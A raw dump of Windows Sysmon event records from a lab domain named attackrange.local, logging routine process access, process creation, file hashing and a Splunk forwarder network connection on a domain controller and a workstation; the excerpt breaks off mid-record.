10341000x8000000000000000106079Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.373{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE78-615A-DC00-00000000FC01}5256C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106078Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.373{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE78-615A-DC00-00000000FC01}5256C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106077Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.373{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE78-615A-DC00-00000000FC01}5256C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106114Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:58.826{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C091597C39D61DE53E668C0F0FDC12B,SHA256=CF45EA3FBF76AE3EAADE410619D1FB7FAF4A1DD7411CBC10C60DAB2836114631,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082920Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:58.992{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082919Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:58.992{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082918Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:58.992{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082917Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:58.992{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082916Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:58.992{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082915Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:58.992{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082914Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:58.992{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082913Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:58.992{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B442-615A-8001-00000000FD01}1140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082912Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:58.992{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B442-615A-8001-00000000FD01}1140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082911Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:58.993{2FDD8D40-B442-615A-8001-00000000FD01}1140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082910Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:58.805{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=811F07D3025AEAB6978F539A3B399955,SHA256=CAB9E60A8771824E74687BC0DEE1041E1DFE09DC4BAF068A020E7B0EFBB6EF31,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106113Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:58.587{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B442-615A-0F02-00000000FC01}4340C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106112Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:58.585{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106111Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:58.585{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106110Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:58.584{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106109Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:58.584{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106108Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:58.584{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B442-615A-0F02-00000000FC01}4340C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106107Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:58.584{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B442-615A-0F02-00000000FC01}4340C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106106Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:58.584{58E9C193-B442-615A-0F02-00000000FC01}4340C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000106105Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.182{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51826-false10.0.1.12-8089- 23542300x8000000000000000106127Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:59.958{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106126Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:59.836{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9DAF8BD0B2A3527E40BCB8DEF5F075B,SHA256=D1938BFD56DA16726B5B4568CEEF9FDF7FAA70C5C206BDD75517AB9A2D058C2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082924Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:59.899{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2655E0DE7A2C1971107E9BCD26126990,SHA256=DB8304F8A4F2F35DCFA91A7CCC8FB20B6357E3313ACDA8994C027BE630C37022,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106125Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:59.694{58E9C193-B443-615A-1002-00000000FC01}43445984C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106124Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:59.523{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B443-615A-1002-00000000FC01}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106123Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:59.521{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106122Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 